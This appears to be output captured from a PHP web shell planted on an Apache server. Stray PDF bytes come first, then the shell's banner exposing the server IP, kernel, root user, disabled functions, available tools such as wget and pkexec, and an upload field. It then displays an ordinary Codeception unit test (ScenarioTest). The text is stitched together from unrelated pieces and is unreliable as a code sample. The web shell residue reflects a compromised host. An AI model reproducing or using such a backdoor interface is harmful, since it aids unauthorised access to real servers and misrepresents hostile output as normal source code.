%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 49.231.201.246 / Your IP : 216.73.216.149 Web Server : Apache/2.4.18 (Ubuntu) System : Linux 246 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64 User : root ( 0) PHP Version : 7.0.33-0ubuntu0.16.04.16 Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /proc/11584/cwd/html/ppaobm/vendor/codeception/base/tests/unit/Codeception/ |
Upload File : |
<?php class ScenarioTest extends \PHPUnit\Framework\TestCase { public function testGetHtml() { $step1 = $this->getMockBuilder('\Codeception\Step') ->setConstructorArgs(['Do some testing', ['arg1', 'arg2']]) ->setMethods(null) ->getMock(); $step2 = $this->getMockBuilder('\Codeception\Step') ->setConstructorArgs(['Do even more testing without args', []]) ->setMethods(null) ->getMock(); $scenario = new \Codeception\Scenario(new \Codeception\Test\Cept('test', 'testCept.php')); $scenario->addStep($step1); $scenario->addStep($step2); $scenario->setFeature('Do some testing'); $this->assertSame( '<h3>I WANT TO DO SOME TESTING</h3>I do some testing <span style="color: #732E81">"arg1","arg2"</span>' . '<br/>I do even more testing without args<br/>', $scenario->getHtml() ); } public function testScenarioCurrentNameReturnsTestName() { $cept = new \Codeception\Test\Cept('successfulLogin', 'successfulLoginCept.php'); $scenario = new \Codeception\Scenario($cept); $this->assertSame('successfulLogin', $scenario->current('name')); } }